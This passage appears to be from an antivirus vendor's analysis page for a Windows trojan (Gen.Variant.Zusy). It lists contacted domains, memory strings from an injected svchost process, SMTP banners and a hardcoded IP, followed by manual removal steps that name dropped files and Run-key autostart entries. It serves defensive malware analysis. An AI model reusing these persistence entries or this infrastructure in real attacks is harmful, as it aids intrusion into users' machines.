erhouse.co.uk;underdoglaw.com;printscharmingbc.ca;legalserver.org;mcvdberg.co.za;atelier-enseignes.com;bureauriscos.com.br;bizeulimmobilier.com;sansum.org;jpcreative.com;mhww.org;nwinnovation.com;namedecision.com;barattare.net;pattilyles.com;vitaliamedspava.com;min3.sakuraweb.com;gabinetemilitar.mg.gov.br;ultimate-tattoo-tips.com;frankfalvo.com;ta-shanghai.com;silverehitus.ee;jaguarlimousineservices.com;autoquipsales.com;hebbes.nl;

svchost.exe_2960_rwx_13140000_01550000:


.text
`.data
iphlpapi.dll
inetcomm.dll
operator
KERNEL32.DLL
kernel32.dll
mscoree.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
GetProcessWindowStation
USER32.DLL
EX8^/u$9^%u
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHLWAPI.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
WININET.dll
GetProcessHeap
KERNEL32.dll
USER32.dll
DNSAPI.dll
GdiplusShutdown
gdiplus.dll
GDI32.dll
ole32.dll
ShellExecuteA
SHELL32.dll
GetCPInfo
?|G9Y
Vc!.UY
3>&< 0&.;
-i0}|
|.Xi/
!"7'$%6:)* ,-./02345&(#>;=?98< 1
mas.lavasoft.com
%System%\regedit.exe
[184.107.38.38]
220 Mail.Ru ESMTP
220 mx.google.com ESMTP qr7si4151843bkb.78 - gsmtp
220 mx.google.com ESMTP n1si4644252qcr.19 - gsmtp
220 mx4.messagingengine.com ESMTP . No UCE permitted.

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:1880
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\detanses[1].htm (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\index[1].htm (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\teknorhino[1].htm (15 bytes)
%Documents and Settings%\%current user%\zygyspypjysl.exe (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\cgc-england[1].htm (13 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@screaminpeach[1].txt (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigjohnsbeefjerky[1].txt (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\safetyconnection[1].htm (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\sortedorganizing[1].htm (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@plus[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\hostphd.com[1].htm (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\JRY7B2.tmp (62 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (881 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@genmar.gen[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@altonhousehotel[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@traderush[1].txt (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\biurimex[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@shipeliteexpress[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@stepnet[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\slf6E4C.tmp.bat (123 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10020 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tavdi[1].txt (217 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\suspendedpage[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\slcago[1].htm (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\churchclothes[1].htm (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\combine.or[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigtopmultimedia[1].txt (239 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sdlp[1].txt (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\sydney[1].htm (357 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@taykon[1].txt (219 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@istanbultarim.com[1].txt (239 bytes)
%Documents and Settings%\%current user%\sufkywiddeax.exe (62 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\empordalia[1].htm (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@racknstackwarehouse.com[1].txt (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\aciuba.com[1].htm (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@wsipowerontheweb[1].txt (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\lucion[1].htm (14 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@theautospas[1].txt (230 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@starmedia[1].txt (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\easyformations[1].htm (19 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@goodvaluecenter[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@neurotoxininstitute[1].txt (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\detanses[1].htm (197 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cbsprinting.com[1].txt (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\solutioncorp[1].htm (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\brijindia[1].htm (28 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@golfpark-moossee[1].txt (281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\sarpy[1].htm (20 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@teasing-video[1].txt (233 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@paintball[1].txt (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\authentica-travel[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\403[1].htm (883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\mibsga[1].htm (619 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\bigtopmultimedia[1].htm (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@telenavis[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doctsf[1].txt (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lockerlookz[1].htm (29 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@westhillsstl[1].txt (232 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ctr4process[2].txt (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\lexjuridica[1].htm (3 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl" = "%Documents and Settings%\%current user%\zygyspypjysl.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sufkywiddeax" = "%Documents and Settings%\%current user%\sufkywiddeax.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Zusy.80539_368c6271e7

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Zusy.80539_368c6271e7

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet